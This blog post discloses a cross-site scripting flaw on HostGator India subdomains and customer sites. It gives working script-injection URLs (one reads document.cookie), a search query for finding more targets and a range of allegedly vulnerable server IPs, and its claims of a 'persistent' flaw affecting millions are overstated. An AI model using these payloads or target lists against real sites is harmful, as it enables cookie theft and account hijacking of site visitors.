Critical Cross Site Scripting {XSS} Vulnerability in Hostgator and IndiaGetOnline making Millions of its Partners Vulnerable
HostGator is a leading provider of web hosting, reseller hosting, vps hosting, and dedicated servers ,Over 8000000 websites trust HostGator for their web hosting , In India No 1 Best Web Hosting Award Winner for 2013 Hostgator for their Free Website Building Resource with IndiaGotOnline Since its establishment in 2002, HostGator has been a world-leading provider of web hosting service .
Today a Indian Security Researchers namely " Manjot Gill " and "Rishal Dwivedi" Send me a XSS Vulnerability in its's one of the subdomain
--> http://www.cluster2.hostgator.co.in/%22%3E%3Cscript%3Ealert(%22HACKED%20BY%20ICH%20%22)%3C/script%3E
and they claim that similarly many sites hosted are vulnerable for example -->
http://ramneeksidhu.in/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
it seems to be impressive on first look i just did a Google Research for the Hostgator.co.in site and i was amazed with the Research results ..
my Research claims now a Critical Persistence XSS Vulnerability in Hostgator
which is affecting more than a Million Websites Hosted with Hostgator.co.in
So lets talk about what i found -->
I firstly check this if its Vulnerable or not -->
No , its giving a Redirection to my.hostgator.in so i proceed to next link that is -->
and yes its Vulnerable now i just did a Google Search and that is -->
"site:.hostgator.co.in"
and done ,Open any link like
http://infragadget.hostgator.co.in/"><script>alert(document.cookie)</script>
it is a Similar Vulnerability like which i found 3 months back in Adobe which was making thousands of subdomains of Adobe Groups Vulnerable
http://infragadget.hostgator.co.in/"><script>alert(document.cookie)</script>
it is a Similar Vulnerability like which i found 3 months back in Adobe which was making thousands of subdomains of Adobe Groups Vulnerable
so for now there is a Persistence XSS vulnerability in Hostgator making 64000 hostgator subdomains + all .in domains which are hosted on Hostgator.co.in are Vulnerable
Proof -->
ip:119.18.48.78 {an ip where some of the hostgator sites are hosted}
and further open any link put up "><script>alert(document.cookie)</script>
after the domain for example -->
Some of the Ip of Domains hosted on hostgator :
119.18.48.12 - 119.18.48.86
bing them change last two numbers like 119.18.48.86 , 119.18.48.65 , 119.18.48.76 etc etc from 12-86 all are Vulnerable
119.18.48.12 - 119.18.48.86
bing them change last two numbers like 119.18.48.86 , 119.18.48.65 , 119.18.48.76 etc etc from 12-86 all are Vulnerable
Affect of Vulnerability :
Each and Every Website hosted with Hostgator.co.in and IndiaGetOnline is Vulnerable to this Vulnerability
thanx 4 such a news
ReplyDeleteawesome find thnx for leaking it :P
ReplyDeleteCool .. yaar very Good
ReplyDeleteI believe it is here in the US as well! If you have a site in the US, check for the directory "/notification" and / or "pending" along with modified htaccess files and odd named php files. Also look for new filenames starting with a .
ReplyDeleteContacted hostgator with full details days ago, still no response and guessing they are working on this.